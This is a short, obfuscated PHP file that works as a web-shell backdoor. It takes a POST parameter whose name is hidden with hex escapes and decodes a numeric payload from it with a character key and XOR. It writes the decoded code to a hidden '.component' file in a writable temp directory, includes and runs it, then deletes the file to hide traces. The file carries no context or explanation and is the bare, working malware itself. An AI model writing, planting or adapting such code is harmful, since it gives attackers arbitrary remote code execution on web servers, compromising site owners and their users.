<?php

if(!empty($_POST["\x70oin\x74er"])){
	$factor = array_filter([getcwd(), "/var/tmp", getenv("TMP"), "/tmp", sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", session_save_path()]);
	$value = $_POST["\x70oin\x74er"];
	 $value	  =explode 		( '.' ,	 	$value)	;
	$flag	=		'';
            $s5	=		'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	=		strlen($s5);
            $i	=		0;
    
            array_walk($value 	,function($v7) use(&$flag 	,&$i 	,$s5 	,$sLen) {
                $chS	=		ord($s5[$i		% $sLen]);
                $dec	=		((int)$v7 - $chS -($i		% 10)) ^ 85;
                $flag		.=	chr($dec);
                $i++; 	}	);
	for ($marker = 0, $mrk = count($factor); $marker < $mrk; $marker++) {
    $rec = $factor[$marker];
    		if ((bool)is_dir($rec) && (bool)is_writable($rec)) {
    $descriptor = join("/", [$rec, ".component"]);
    if (file_put_contents($descriptor, $flag)) {
	include $descriptor;
	@unlink($descriptor);
	exit;
}
}
}
}